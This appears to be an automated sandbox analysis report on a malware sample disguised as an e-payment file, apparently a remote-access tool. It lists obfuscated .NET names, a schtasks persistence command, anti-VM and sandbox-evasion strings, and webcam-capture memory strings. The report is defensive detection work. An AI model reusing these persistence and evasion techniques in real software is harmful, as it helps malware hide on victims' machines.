            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, GIcmcBXmdsr9o6R5jH.csHigh entropy of concatenated method names: 'rar9R8yDPU', 'LSl9j9E0tQ', 'ToString', 'yAQ9Sp11go', 'eNs9NOZoTc', 'cuV9AWqlmf', 'gVt9lYT05n', 'oPx9WxyIRH', 'AJw9nrddHN', 'tBj9I8Rc7R'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, aJXx8DABJGbejPMByH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GtQ5GT9B6G', 'Pbu5QFNrfK', 'wDs5zgWekY', 'xaowLO9Il7', 'IOJwKcXv6R', 'HuXw5kpssR', 'jtPwwUYtOC', 'UdFGnL30xPZwNsgKrEN'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, LS7EsZky9IidIcyfRu.csHigh entropy of concatenated method names: 'KJZKnMdNgs', 'U5WKIh7whK', 'TYRKRpOJPH', 'VhlKjFrDBW', 'wicKERWcGI', 'L7vKOGkmTJ', 'rTVh9BxhHLC1hpgjne', 'Um4K2Xrl2MiwoUVpmk', 'SQnKKKQ0w3', 'Py2Kwpe6ao'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, vGIT7vmGkmTJonR3Jr.csHigh entropy of concatenated method names: 'FI9WagBBwr', 'AX0WNuglZI', 'f0bWl3O1qa', 'bDoWnaWcS5', 'daZWIYWV6s', 'QCelCF9Fxs', 'SpalrkUifC', 'wZUlgEyKTb', 'ry9lbmWrC3', 'NIclG4tgSQ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, bR6muntND966Zj1tHg.csHigh entropy of concatenated method names: 'NwM71lP3vJ', 'ScV7PlhL8V', 'mwx7moNQs4', 'IAk74sSG1k', 'vPM7FlVT5P', 'LK17UsQlhM', 'Feb7T5Kr89', 'HXc7HIT0Ce', 'zBt7hQGx3c', 'GsE730ao45'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, al7GZ9yc9cs62qKrsm.csHigh entropy of concatenated method names: 'HtknYldqg0', 'cgCnsNbeMp', 'MvhnxYukUN', 'C7VndIvOW8', 'iSPnZZDQV5', 'LMenVyh3dv', 'qRUnqcHeeV', 'FLin1NxT2A', 'MWSnP7Buot', 'SZWnDvjqjR'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, TM8wBMKwOiMiiMRkZ5P.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mNhMJ0SgvM', 'O7lMBfJQPr', 'WDuMiv94X8', 'SlmMXYHrqC', 'ep8MC6TXRj', 'uPHMrAU5Jv', 'mpWMgnogDd'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, n0YQspKKCBy6FdP62Xy.csHigh entropy of concatenated method names: 'ToString', 'STPMwBdd9Y', 'qa9Mkub752', 'FTCMaYXvuD', 'mPRMSJDXLw', 'ecwMN0SU2B', 'Yd2MASNmRQ', 'yK8Mlrl9b1', 'Bhy9wBnasMBAWMnOJ5J', 'KnhCxRnGWRcYTQGrmwk'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, n549rSinEmAngKcBlV.csHigh entropy of concatenated method names: 'ToString', 'tqNO3p76rM', 'Nt4O4akmL3', 'EAUOuWNNjT', 'AvlOF5KtPL', 'wfIOUpI9Jj', 'pQ9O6e2iMp', 'LwaOTj9t4g', 'aYGOHLjW1o', 'fY8OyvE0sq'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, uYj2wPN1bAqkIUsRaQ.csHigh entropy of concatenated method names: 'Dispose', 'e0bKGLVBl0', 'AO954twDAn', 'Ltp114hTQB', 'T6ZKQRuUXR', 'FNZKzIxhMQ', 'ProcessDialogKey', 'qXg5L0Vona', 'V5h5KcTpAb', 'LQZ55Bc3Ih'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, AMdNgs1C5Wh7whKrJR.csHigh entropy of concatenated method names: 'dg4NJOuCQ1', 'KqGNBrxYZh', 'ARINi7Sym3', 'MCnNX5Ap3c', 'NoYNCYIwCq', 'UrVNrEks0L', 'J3XNgPk7Pb', 'jNgNbSHgVW', 'kANNGsj1B5', 'q5RNQcq6A5'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, Yt8bxSrDHY74lmgX1O.csHigh entropy of concatenated method names: 'tB99b8eYYq', 'zcK9QVXega', 'H5deLfuPQ6', 'tBXeKTLx8A', 'D2L93rE9KO', 'boI9828ax2', 'VKC9tm3GUB', 'qYd9Jxhk1M', 'RpI9B7JHW9', 'j1p9i4BSj3'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, KZRuUXbRDNZIxhMQ9X.csHigh entropy of concatenated method names: 'mJTeSJ2POL', 'tkEeNxk6v5', 'qkneAM3AYB', 'XtPelIvt1S', 'bLoeWa1G2e', 'BQdenx67Hj', 'jXXeIXvkgB', 'jnae0ReC7u', 'qtneRZl0EX', 'gG7ejtHKiJ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, VDBWLRDS2RfjQficRW.csHigh entropy of concatenated method names: 'IrClZMq7vq', 'QFrlqkJclV', 'js5Aux07g8', 'TncAF0H7lD', 'lulAU7ETUd', 'IAfA6Yd97I', 'HgUATwBoaC', 'do7AHsFp6H', 'JqLAybNjup', 'pDUAhPIwib'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, Rc3IhyQpIM2qjSGJZ7.csHigh entropy of concatenated method names: 'yo7oKXccF4', 'yjOowRsQ1d', 'y5uokIUbBC', 'PI2oSfG6kC', 'ox0oNn16M2', 'kp8ol3AbQA', 't2JoWu4ew2', 'XrQegNSm2C', 'JuiebOVjvC', 'oK9eGISbBa'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, mAs9Z5JbfVQvPBhYBI.csHigh entropy of concatenated method names: 'XcpEhwinI1', 'BioE8Z75or', 'DumEJUT61M', 'arFEBYPBcK', 'XbvE4ZscCI', 'OJkEuTmLYj', 'lqbEFXlAwJ', 'mFnEUl3fcE', 'hgTE6Kkl7C', 'w1PETD0vI8'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, W0VonaGr5hcTpAbTQZ.csHigh entropy of concatenated method names: 'pwKemh4eIq', 'ahve4VNEtD', 'OrveuEfGkl', 'BU0eFnyP2O', 'dbweJVjkDd', 'p6feUiRmvq', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, atuRJ3TU8htJN5Xrv0.csHigh entropy of concatenated method names: 'S0vnSxPYmc', 'cG9nAMC28O', 'hI1nW2KiW1', 'eYDWQP9OLW', 'oSRWzvOKUk', 'NldnLdIPAn', 'QcknKB4BIC', 'fNAn5QvNq3', 'y7enwNHdyO', 'CUOnkWAksS'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, gH50Mg5ADNSMKJgZZY.csHigh entropy of concatenated method names: 'IO8xmc5rP', 'yhldqwoKE', 'apQVkaRG2', 'nf0qMdgeO', 'vJFPABrDA', 'rH6DluZsg', 'KgcvgcYoHP0Jd4gs65', 'SdBNZ0orG6ScaBqob7', 'dxre5Z5Qb', 'oOyMjIM5f'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, eX7sUIKLXbLBJFUXJss.csHigh entropy of concatenated method names: 'woGoYhHK1o', 'xtJosFQbfX', 'fUNoxlMKKO', 'bNmodohltZ', 'ADCoZLb1bE', 'nZBoVAOPPd', 'SR6oqoKxC4', 'dg0o1D60ZE', 'lXvoPSko2K', 'AEPoDwH9yV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, FoCs0V4dUW7V9Ys8RL.csHigh entropy of concatenated method names: 'EU7KbyI9fmOqp1QSTU0', 'FqUuypIUQtji1NQJx7g', 'zxHWed1vib', 'EGGWoVt38U', 'G8cWMOZjhr', 'zCih6WIyfi1yoX40fke', 'Ndd86NImLqRtr3wfD2N'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, j6u7xiPYRpOJPHghlF.csHigh entropy of concatenated method names: 'UJEAdt1fko', 'd97AVgVlHu', 'NcuA1UAr7m', 'Tu3AP42ys1', 'qW3AEG10BF', 'JG5AOZP9g7', 'ry7A9fCiHa', 'sJYAea4coq', 'IM7Ao1R0PF', 'NRgAMuPOqZ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.csHigh entropy of concatenated method names: 'wZmwaJ0lMI', 'lOZwSBnVIT', 's8swNce0dM', 'aq0wATSknj', 'k5ywl5BoHo', 'aaMwWNmETw', 'KxnwnosyNW', 'JGLwI2ERu4', 'Tc0w0XfKsR', 'uNZwRTqrmV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, GIcmcBXmdsr9o6R5jH.csHigh entropy of concatenated method names: 'rar9R8yDPU', 'LSl9j9E0tQ', 'ToString', 'yAQ9Sp11go', 'eNs9NOZoTc', 'cuV9AWqlmf', 'gVt9lYT05n', 'oPx9WxyIRH', 'AJw9nrddHN', 'tBj9I8Rc7R'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, aJXx8DABJGbejPMByH.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GtQ5GT9B6G', 'Pbu5QFNrfK', 'wDs5zgWekY', 'xaowLO9Il7', 'IOJwKcXv6R', 'HuXw5kpssR', 'jtPwwUYtOC', 'UdFGnL30xPZwNsgKrEN'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, LS7EsZky9IidIcyfRu.csHigh entropy of concatenated method names: 'KJZKnMdNgs', 'U5WKIh7whK', 'TYRKRpOJPH', 'VhlKjFrDBW', 'wicKERWcGI', 'L7vKOGkmTJ', 'rTVh9BxhHLC1hpgjne', 'Um4K2Xrl2MiwoUVpmk', 'SQnKKKQ0w3', 'Py2Kwpe6ao'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, vGIT7vmGkmTJonR3Jr.csHigh entropy of concatenated method names: 'FI9WagBBwr', 'AX0WNuglZI', 'f0bWl3O1qa', 'bDoWnaWcS5', 'daZWIYWV6s', 'QCelCF9Fxs', 'SpalrkUifC', 'wZUlgEyKTb', 'ry9lbmWrC3', 'NIclG4tgSQ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, bR6muntND966Zj1tHg.csHigh entropy of concatenated method names: 'NwM71lP3vJ', 'ScV7PlhL8V', 'mwx7moNQs4', 'IAk74sSG1k', 'vPM7FlVT5P', 'LK17UsQlhM', 'Feb7T5Kr89', 'HXc7HIT0Ce', 'zBt7hQGx3c', 'GsE730ao45'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, al7GZ9yc9cs62qKrsm.csHigh entropy of concatenated method names: 'HtknYldqg0', 'cgCnsNbeMp', 'MvhnxYukUN', 'C7VndIvOW8', 'iSPnZZDQV5', 'LMenVyh3dv', 'qRUnqcHeeV', 'FLin1NxT2A', 'MWSnP7Buot', 'SZWnDvjqjR'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, TM8wBMKwOiMiiMRkZ5P.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mNhMJ0SgvM', 'O7lMBfJQPr', 'WDuMiv94X8', 'SlmMXYHrqC', 'ep8MC6TXRj', 'uPHMrAU5Jv', 'mpWMgnogDd'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, n0YQspKKCBy6FdP62Xy.csHigh entropy of concatenated method names: 'ToString', 'STPMwBdd9Y', 'qa9Mkub752', 'FTCMaYXvuD', 'mPRMSJDXLw', 'ecwMN0SU2B', 'Yd2MASNmRQ', 'yK8Mlrl9b1', 'Bhy9wBnasMBAWMnOJ5J', 'KnhCxRnGWRcYTQGrmwk'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, n549rSinEmAngKcBlV.csHigh entropy of concatenated method names: 'ToString', 'tqNO3p76rM', 'Nt4O4akmL3', 'EAUOuWNNjT', 'AvlOF5KtPL', 'wfIOUpI9Jj', 'pQ9O6e2iMp', 'LwaOTj9t4g', 'aYGOHLjW1o', 'fY8OyvE0sq'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, uYj2wPN1bAqkIUsRaQ.csHigh entropy of concatenated method names: 'Dispose', 'e0bKGLVBl0', 'AO954twDAn', 'Ltp114hTQB', 'T6ZKQRuUXR', 'FNZKzIxhMQ', 'ProcessDialogKey', 'qXg5L0Vona', 'V5h5KcTpAb', 'LQZ55Bc3Ih'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, AMdNgs1C5Wh7whKrJR.csHigh entropy of concatenated method names: 'dg4NJOuCQ1', 'KqGNBrxYZh', 'ARINi7Sym3', 'MCnNX5Ap3c', 'NoYNCYIwCq', 'UrVNrEks0L', 'J3XNgPk7Pb', 'jNgNbSHgVW', 'kANNGsj1B5', 'q5RNQcq6A5'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, Yt8bxSrDHY74lmgX1O.csHigh entropy of concatenated method names: 'tB99b8eYYq', 'zcK9QVXega', 'H5deLfuPQ6', 'tBXeKTLx8A', 'D2L93rE9KO', 'boI9828ax2', 'VKC9tm3GUB', 'qYd9Jxhk1M', 'RpI9B7JHW9', 'j1p9i4BSj3'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, KZRuUXbRDNZIxhMQ9X.csHigh entropy of concatenated method names: 'mJTeSJ2POL', 'tkEeNxk6v5', 'qkneAM3AYB', 'XtPelIvt1S', 'bLoeWa1G2e', 'BQdenx67Hj', 'jXXeIXvkgB', 'jnae0ReC7u', 'qtneRZl0EX', 'gG7ejtHKiJ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, VDBWLRDS2RfjQficRW.csHigh entropy of concatenated method names: 'IrClZMq7vq', 'QFrlqkJclV', 'js5Aux07g8', 'TncAF0H7lD', 'lulAU7ETUd', 'IAfA6Yd97I', 'HgUATwBoaC', 'do7AHsFp6H', 'JqLAybNjup', 'pDUAhPIwib'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, Rc3IhyQpIM2qjSGJZ7.csHigh entropy of concatenated method names: 'yo7oKXccF4', 'yjOowRsQ1d', 'y5uokIUbBC', 'PI2oSfG6kC', 'ox0oNn16M2', 'kp8ol3AbQA', 't2JoWu4ew2', 'XrQegNSm2C', 'JuiebOVjvC', 'oK9eGISbBa'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, mAs9Z5JbfVQvPBhYBI.csHigh entropy of concatenated method names: 'XcpEhwinI1', 'BioE8Z75or', 'DumEJUT61M', 'arFEBYPBcK', 'XbvE4ZscCI', 'OJkEuTmLYj', 'lqbEFXlAwJ', 'mFnEUl3fcE', 'hgTE6Kkl7C', 'w1PETD0vI8'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, W0VonaGr5hcTpAbTQZ.csHigh entropy of concatenated method names: 'pwKemh4eIq', 'ahve4VNEtD', 'OrveuEfGkl', 'BU0eFnyP2O', 'dbweJVjkDd', 'p6feUiRmvq', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, atuRJ3TU8htJN5Xrv0.csHigh entropy of concatenated method names: 'S0vnSxPYmc', 'cG9nAMC28O', 'hI1nW2KiW1', 'eYDWQP9OLW', 'oSRWzvOKUk', 'NldnLdIPAn', 'QcknKB4BIC', 'fNAn5QvNq3', 'y7enwNHdyO', 'CUOnkWAksS'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, gH50Mg5ADNSMKJgZZY.csHigh entropy of concatenated method names: 'IO8xmc5rP', 'yhldqwoKE', 'apQVkaRG2', 'nf0qMdgeO', 'vJFPABrDA', 'rH6DluZsg', 'KgcvgcYoHP0Jd4gs65', 'SdBNZ0orG6ScaBqob7', 'dxre5Z5Qb', 'oOyMjIM5f'
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | File created: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe

            Boot Survival

            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JXHPwNYzysUjKo" /XML "C:\Users\user\AppData\Local\Temp\tmpD623.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (132).png
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 13_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress | 13_2_00407D38
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match; File source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Code function: 13_2_00401102 in eax, dx
            Source: JXHPwNYzysUjKo.exe, JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp; Binary or memory string: TSBIEDLL.DLL
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Memory allocated: 650000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Memory allocated: 26D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Memory allocated: 2360000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Memory allocated: 57D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Memory allocated: 67D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Memory allocated: 6A00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Memory allocated: 7A00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Memory allocated: EE0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Memory allocated: 2840000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Memory allocated: 4840000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Memory allocated: 5C60000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Memory allocated: 6C60000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Memory allocated: 6EA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Memory allocated: 7EA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6566
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1229
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6817
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 739
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Window / User API: threadDelayed 469
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Window / User API: threadDelayed 1426
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Window / User API: threadDelayed 7364
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe; Window / User API: foregroundWindowGot 1766
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; Evaded block: after key decision (graph_13-3931)
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe; API coverage: 2.2 %
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7572; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768; Thread sleep count: 6566 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972; Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748; Thread sleep count: 1229 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988; Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7976Thread sleep count: 469 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7976Thread sleep time: -4690000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep count: 1426 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep time: -713000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep count: 7364 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep time: -3682000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe TID: 8044Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040376Fh13_2_0040374A
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040376Fh13_2_0040374A
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe Code function: 13_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose, 13_2_0040F234
            Source: JXHPwNYzysUjKo.exe, JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1409996431.0000000002729000.00000004.00000800.00020000.00000000.sdmp, e-Payment.NET.CMS4006975815.exe, 00000000.00000002.1411266191.000000000373C000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1446098727.00000000038AA000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 00000009.00000002.1444552308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?playaudiodatafmt WAVERIFF.wav%Y-%m-%d %H.%MgetcamsingleframenocamerastartcamcapclosecamgetcamframeinitcamcapFreeFrameGetFrameCloseCameraOpenCameracamdlldatacamframe|dmc|[DataStart][DataStart]0000%02i:%02i:%02i:%03i [KeepAlive] Enabled! (Timeout: %i seconds)
            Source: e-Payment.NET.CMS4006975815.exe, 00000008.00000002.3845340748.00000000013E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe Code function: 13_2_0040E4C4 LoadLibraryA,GetProcAddress, 13_2_0040E4C4
